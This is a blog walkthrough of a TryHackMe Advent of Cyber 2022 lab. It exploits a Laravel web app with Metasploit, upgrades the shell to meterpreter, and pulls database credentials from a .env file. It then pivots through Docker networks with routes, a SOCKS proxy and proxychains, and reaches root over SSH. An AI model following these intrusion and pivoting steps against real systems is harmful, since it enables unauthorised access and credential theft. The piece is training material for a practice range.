Welcome to yet another blog guys. I hope you all are doing well. Are you enjoying this season of the advent of cyber? I guess this season is pretty good. So without any further let's move to today's task.
Dock the halls
Note: Please don't use the normal attack box in this task. Use kali Linux instead.
So this room is mainly focusing on Metasploit and meterpreter.
Before this, let's first understand Dorker. Dorker is a way to package applications, and the associated dependencies into a single unit called an image. This image can then be shared and run as a container, either locally as a developer or remotely on a production server. Now, let's understand Metasploit. A Metasploit Framework is a powerful tool that provides a universal interface to work with vulnerability exploit code. It has exploit code for a wide range of vulnerabilities that impact web servers, OSes, network equipment and everything in between.
Meterpreter is an advanced payload that provides interactive access to a compromised system. Meterpreter supports running commands on a remote target, including uploading/downloading files and pivoting.
Another term came, What is pivoting? Suppose you got access of one machine. Now, You can get access to more machines through that already compromised machine. The act of an attacker moving from one compromised system to one or more other systems within the same or other organizations.
I would recommend you to complete Metasploit room as it is a very deep topic. I would not able to complete all the Metasploit in this room. Let's move to the task.
Question1
For this, we will use nmap . The syntax will be :
nmap -sC -sV -F<ip address\>
Question2
Let's first start our Metasploit. For this, the command is msfconsole
Paste the IP address in firefox. Open the inspect elements and click on the network tab. Scroll down a bit and you can see the laravel framework.
Question3
Go to your Metasploit and search laravel.
move to the second module by use command.
Now, use command info command to get the CVE.
Now let's check if the system is vulnerable or not.
Execute command set RHOST <ip address>
and then check
Now use the command ip a and then set LHOST eth0
Use command exploit.
And now id command
Let's upgrade this shell to meterpreter.
For this, use the command background and then yes.
Check the sessions first by sessions command.
Question4
For this, the syntax is: sessions -u -1
Check the session again by session command. You can see we have two sessions now.
To go inside the meterpreter, use session -i 2
You can use the help command to get information about the basic command of meterpreter.
Question5
For this, use the command ls /
You can see the docker file in this list.
Let's create a shell by shell command
Use command id . Now, env and change directory to /var/www. Now, use ls -la for listing files.
Let's see the content of .env
Question6
As you can see all the passwords are in .env file, so the answer is .env.
Question7
Use exit command to get out of shell. But Before that, focus on we need to find the table of the database and the only database in .env file is
Let's resolve this database. Use resolve webservice_database command
This IP address is internal ip address, so we cannot ping it. Let's use mfsconsole to pivot this address. Remember, I told you that we can compromise more systems by already compromised system. In this case, we are doing this only.
Let's get back to our mfsconsole. Use the background command to do so.
Use the command route add <databse ip address>/32 2(Which we found when we resolved the database,32 is the subnet of this IP address and 2 is the session number).
We can also see, due to the presence of the /.dockerenv file, that we are in a docker container. By default, Docker chooses a hard-coded IP to represent the host machine. We will also add that to our routing table for later scanning.
Use route print to check the address we just added.
Now, let's access the database. Remember the password and username. It was something postgres. Let's search this in our Metasploit.
The one we are going to use is :
As you can see it is on the 16th number, so execute the command use 16 to use this.
You can see the address change now. Let's again change our RHOST.
set RHOST <databse ip>
Use command exploit.
Got the table name.
Question8
For the password, let's search for postgress again.
We are going to use this module:
use 11
This module will help us to execute simple SQL Queries.
Set the RHOST again, just like we set it above.If you use command info, you can see the name of the database is not correct.
Use command set DATABASE postgres
Let's use some SQL knowledge here. set SQL "Select * from users" (This will show us all the columns in our table) and now use the run command
We got the password.
Question9
To further pivot through the private network, we can create a socks proxy within Metasploit:
Search socks
We will use 0 module. Use 0
Then use run to run this module. Now go to another terminal with root user, we can use curl with the internal Docker IP to show that the web application is running, and the socks proxy works.
Use command : curl --proxy socks5://127.0.01:1080 http://172.17.0.1 -v
This means we can access a web server on this website.
Now let's use proxychains. Go to /etc/proxychains4.conf file and scroll till the last.
Change this to :
ProxyChains is a tool that redirects TCP connections made by applications, through various proxies like SOCKS4, SOCKS5, or HTTP. In our case, it is taking curl's traffic and routing to Metasploit. Use command proxychains curl http://172.17.0.1 .
We will get to see some source code just like before.
Let's use nmap now. Use proxychains nmap -F -sT -Pn 172.17.0.1
Got the result? It's ssh and http (22,80)
Question10
Let's dig into ssh. Again to metalsploit. Search ssh_login. We will use 0th module here.
Now let's set our username and password which we got in question 8.
set USERNAME santa then set PASSWORD p4$$w0rd
Set RHOST 172.17.0.1
run
check sessions. You can see 4th session as shell linux.
sessions -i 4
then id command. Okay, we are root.
cd /root
You can see root.txt . Cat root.txt . You can see the flag.
We made it. We finally made it. It was not an easy task. But you have done it.
Question 11
They are recommending you to complete Compromising Active Directory module
Congratulations !! we completed this task. New task will be added tomorrow. Till then you can follow me here for upcoming blogs on the advent of cyber 2022. In the end, you will get a certificate from tryhackme for completing this challenge.
Keep learning and keep spreading Knowledge.